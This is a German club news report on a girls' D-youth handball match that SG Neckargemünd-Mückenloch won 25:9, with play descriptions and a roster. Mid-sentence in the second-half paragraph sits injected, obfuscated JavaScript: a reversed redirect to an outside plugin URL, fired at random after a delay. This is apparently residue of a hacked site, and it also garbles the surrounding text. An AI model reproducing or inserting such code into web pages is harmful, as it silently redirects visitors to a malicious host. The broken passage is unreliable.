Am Ewigkeitssonntag trafen sich die D-Jugend Mädels der SG Neckargemünd-Mückenloch um 11.30 Uhr an der Münzenbachhalle in Neckargemünd. Ziel war es, sich zwei Punkte gegen die Mädels von der SG Meckesheim-Eschelbronn zu erkämpfen.
Neckargemünd, 24.11.13 (cko) – Das Spiel begann leider nicht wie geplant, denn es musste sich mal wieder auf die Suche nach einem Schiedrichter gemacht werden. Aber das Problem war schnell gelöst, denn netterweise ist Jochen Feßenbecker – Mann vom Fach- eingesprungen. DANKE!
So konnte mit 15 minütiger Verspätung das Spiel begonnen werden. In der ersten Halbzeit wurde 4 gegen 4 gespielt. Ronja G. und Lena waren zunächst Läuferinnen und spielten sowohl im Angriff als auch in der Abwehr. Im Angriff zogen sie die Abwehr der Mädels aus Meckesheim und Eschelbronn auseinander und erarbeiteten sich selbst, aber auch ihren Mitspielerinnen, immer wieder Torchancen. Vor allem Keilie und Saskia hatten einen guten Drang zum Tor und erzielten dadurch insgesamt 11 Treffer.
In der Abwehr kam es immer wieder zu Schwierigkeiten, es wurde nicht richtig abgezählt. Aber dank einer guten Leistung von Torfrau Sandra, wurden die kleinen Probleme ausgeglichen. Nachdem in der Auszeit über die Schwierigkeiten in der Abwehr gesprochen wurde, zählte man nun besser ab. Janina löste das Problem auf ihre eigene Art und Weise und nahm ihre Gegenspielerin kurz. Sie ergatterte der Mannschaft dadurch 3-mal den Ball, die dann mit Tempo nach vorne das Tor traf.
Halbzeitstand: 17:5
In der zweiten Hälfte wurde dann im Angriff gegen eine 6:0 Deckung gespielt. Die Umstellung führte zunächst zu technischen Fehlern, wodurch nicht richtig ins Spiel gefunden werden konnte. Man hatte nicht mehr den gewohnten Platz wie in der ersten Hälfte, sondern musste nun auf die Lücken stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toßen. Aber durch Einläufer und das Anziehen zum Wechseln wurde die gegnerische Deckung durchdrungen.
Die Deckung musste sich ebenfalls auf die 6 Angriffsspielerinnen neu einstellen aber trotz vielem Auswechseln hatte man die gegnerischen Mädels gut im Griff. Vor allem Hanna und Jasmin haben sich auf der rechten Seite gut unterstützt, es gab kein Durchdringen der Meckesheimerinnen. Auch im Angriff spielten beide mit Druck aufs Tor, wodurch sie insgesamt 3 Tore erzielten.
Durch eine gute Mannschaftsleistung wurde das Spiel deutlich mit 25: 9 gewonnen (Tabelle)
Am kommenden Sonntag trifft die SG Neckargemünd- Mückenloch auf die D- Jugend der JSG SG Walldorf/SC Sandhausen.
Es spielten:
Im Tor: Sandra Huber (1), Jana Gerlach
Im Feld: Ronja Gölz (5),Jasmin Al-Hadjadi (1), Hanna Müller (2), Saskia Müller (7), Janina Reinwald, Keilie Golic (5), Ronja Dietz (2), Lena Kramer (2), Marisa Finzer, Anja Thieme